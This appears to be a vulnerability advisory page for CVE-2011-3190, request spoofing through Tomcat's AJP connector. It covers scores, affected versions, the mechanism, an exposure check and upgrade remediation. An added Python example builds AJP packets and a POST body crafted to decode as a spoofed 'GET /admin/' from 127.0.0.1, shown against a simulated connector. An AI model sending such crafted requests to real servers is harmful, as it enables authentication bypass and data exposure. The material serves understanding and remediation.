CVSS2
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
Confidence: Low
EPSS
Percentile: 85.4%
Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.

Mechanism: AJP is the protocol a reverse proxy (mod_jk, mod_proxy_ajp) uses to hand requests to Tomcat. When a request carries a body, the proxy sends the first body chunk unsolicited, directly behind the Forward Request message. If the web application never reads that body, the affected connectors left the chunk in the connection and, on the next pass of their read loop, dispatched it as if it were a new message. Because that chunk is the client's own POST body, an attacker can supply bytes that decode as a Forward Request of their choosing: method, URI, headers, remote address and request attributes then come from the attacker rather than from the proxy, which is what makes the authentication bypass and information disclosure possible. The fix reads and discards the unread body chunk before the next request is accepted; it shipped in Tomcat 7.0.21, 5.5.34 and, for the 6.0 branch, 6.0.35 (6.0.34 was never released).

Exposure check: only deployments that use an AJP connector are affected; look for a Connector with protocol="AJP/1.3" in server.xml. A Tomcat that is reached over its HTTP connector only does not use this framing. Upgrading is the remediation. Restricting the AJP port to the proxy's address is good hygiene but does not address this issue, because the spoofed request arrives through the legitimate proxy connection.
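The framing described above, as an added example that is not part of the original page and is not Tomcat, mod_jk or mod_proxy_ajp code. It encodes AJP13 proxy-to-container packets (Forward Request and body chunk) following the protocol's published layout, then replays one stream through a minimal connector loop twice: once without state tracking (the vulnerable behaviour) and once with the unread body chunk discarded (the fix). The hostnames, addresses, URIs, the 514-byte body and the simplified dispatch loop are all constructed for the illustration; the real connector's state machine has more paths than modelled here.

```python
"""
AJP13 framing and the unsolicited body chunk: how a connector that does not track
"body pending" state can mistake a POST body for a new Forward Request. Added
example, not Tomcat/mod_jk/mod_proxy_ajp code; framing follows the AJP13 spec
(magic 0x12 0x34, prefix 2 = Forward Request, strings = 2-byte length + bytes +
NUL). Hosts, URIs and body bytes are constructed.
"""
import struct

MAGIC, FORWARD_REQUEST = b"\x12\x34", 2               # proxy->container magic, prefix code
METHOD_CODES = {2: "GET", 4: "POST"}                  # subset of the AJP13 method table
HEADER_CODES = {0xA007: "content-type", 0xA008: "content-length"}
CODED_HEADERS = {v: k for k, v in HEADER_CODES.items()}

def ajp_string(s):
    """AJP string: 2-byte length, bytes, NUL; None is the 0xFFFF null marker."""
    if s is None:
        return b"\xff\xff"
    b = s.encode()
    return struct.pack(">H", len(b)) + b + b"\x00"

def read_ajp_string(buf, pos):
    (n,) = struct.unpack_from(">H", buf, pos)
    if n == 0xFFFF:
        return None, pos + 2
    return buf[pos + 2:pos + 2 + n].decode(), pos + 3 + n    # +1 skips the NUL

def frame(payload):                                   # magic, 2-byte payload length, payload
    return MAGIC + struct.pack(">H", len(payload)) + payload

def split_packets(stream):                            # proxy->container stream -> payload list
    payloads, pos = [], 0
    while pos < len(stream):
        if stream[pos:pos + 2] != MAGIC:
            raise ValueError("bad AJP magic at offset %d" % pos)
        (n,) = struct.unpack_from(">H", stream, pos + 2)
        payloads.append(stream[pos + 4:pos + 4 + n])
        pos += 4 + n
    return payloads

def forward_request_fields(uri, remote_addr, headers):
    """Forward Request payload after the prefix and method bytes."""
    p = ajp_string("HTTP/1.1") + ajp_string(uri)
    p += ajp_string(remote_addr) + ajp_string(None)                   # remote_addr, remote_host
    p += ajp_string("app.example") + struct.pack(">H", 80) + b"\x00"  # server_name, port, is_ssl
    p += struct.pack(">H", len(headers))
    for name, value in headers:
        code = CODED_HEADERS.get(name.lower())                        # well-known names are coded
        p += (struct.pack(">H", code) if code else ajp_string(name)) + ajp_string(value)
    return p + b"\xff"                                                # no attributes; terminator

def forward_request(method_code, uri, remote_addr, headers=()):
    return frame(bytes([FORWARD_REQUEST, method_code]) + forward_request_fields(uri, remote_addr, headers))

def body_chunk(data):                                 # 2-byte data length, then the data
    return frame(struct.pack(">H", len(data)) + data)

def parse_forward_request(payload):
    method, pos = METHOD_CODES.get(payload[1], "code%d" % payload[1]), 2
    _protocol, pos = read_ajp_string(payload, pos)
    uri, pos = read_ajp_string(payload, pos)
    remote_addr, pos = read_ajp_string(payload, pos)
    _remote_host, pos = read_ajp_string(payload, pos)
    _server_name, pos = read_ajp_string(payload, pos)
    pos += 3                                                          # server_port + is_ssl
    (num_headers,) = struct.unpack_from(">H", payload, pos)
    pos, headers = pos + 2, {}
    for _ in range(num_headers):
        if payload[pos] == 0xA0:                                      # coded header name
            (code,) = struct.unpack_from(">H", payload, pos)
            name, pos = HEADER_CODES[code], pos + 2
        else:
            name, pos = read_ajp_string(payload, pos)
        value, pos = read_ajp_string(payload, pos)
        headers[name.lower()] = value
    return {"method": method, "uri": uri, "remote_addr": remote_addr, "headers": headers}

def run_connector(stream, app_reads_body, swallow_unread_body):
    """Minimal connector read loop; swallow_unread_body models the fix (discard the
    unsolicited chunk of a request whose body was never read before reading on)."""
    payloads, seen, i = split_packets(stream), [], 0
    while i < len(payloads):
        payload, i = payloads[i], i + 1
        if payload[0] != FORWARD_REQUEST:
            continue                                                  # not a request; dropped
        req = parse_forward_request(payload)
        seen.append(req)
        if int(req["headers"].get("content-length", "0")) > 0:
            if app_reads_body or swallow_unread_body:
                i += 1                                                # consume the first chunk
            # vulnerable case: the chunk stays queued and is dispatched above as a message
    return seen

def demo():
    """POST whose body the application never reads. The body is sized so the chunk's
    data-length field 0x0202 (514) reads as prefix 2 + method 2 (GET), after which
    the body bytes parse as GET /admin/ from 127.0.0.1. Returns (vulnerable, fixed)."""
    spoof = forward_request_fields("/admin/", "127.0.0.1", [("Host", "app.example")])
    body = spoof.ljust(514, b"\x00")                  # bytes past the 0xFF terminator are ignored
    stream = forward_request(4, "/upload", "203.0.113.7",
                             [("Content-Length", str(len(body)))]) + body_chunk(body)
    return (run_connector(stream, app_reads_body=False, swallow_unread_body=False),
            run_connector(stream, app_reads_body=False, swallow_unread_body=True))
```

Calling demo() returns two request lists: the vulnerable loop reports a second request, GET /admin/ with remote address 127.0.0.1, that the proxy never sent, while the fixed loop reports only the POST. The point of the example is the two bytes at the front of every body chunk: they are the chunk's data length, not a message type, so any loop that dispatches on the first byte without remembering that a body is pending will read a body of a suitable length as a fresh message whose remaining fields the client controls.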
Vendor | Product | Version | CPE |
---|---|---|---|
org.apache.tomcat | tomcat | * | cpe:2.3:a:org.apache.tomcat:tomcat:*:*:*:*:*:*:*:* |
marc.info/?l=bugtraq&m=132215163318824&w=2
marc.info/?l=bugtraq&m=133469267822771&w=2
marc.info/?l=bugtraq&m=136485229118404&w=2
marc.info/?l=bugtraq&m=139344343412337&w=2
securityreason.com/securityalert/8362
www.debian.org/security/2012/dsa-2401
www.mandriva.com/security/advisories?name=MDVSA-2011:156
exchange.xforce.ibmcloud.com/vulnerabilities/69472
github.com/advisories/GHSA-c38m-v4m2-524v
github.com/apache/tomcat/commit/a2538ce78f83b7376c48d12d8247600079d789b1
github.com/apache/tomcat55/commit/be3eb28f82250a5c81a1c42216570ebf892aefac
issues.apache.org/bugzilla/show_bug.cgi?id=51698
lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E
nvd.nist.gov/vuln/detail/CVE-2011-3190
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14933
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19465
web.archive.org/web/20130121232525/www.securityfocus.com/archive/1/519466/100/0/threaded
web.archive.org/web/20130314002148/www.securityfocus.com/bid/49353
web.archive.org/web/20131214094052/www.securitytracker.com/id?1025993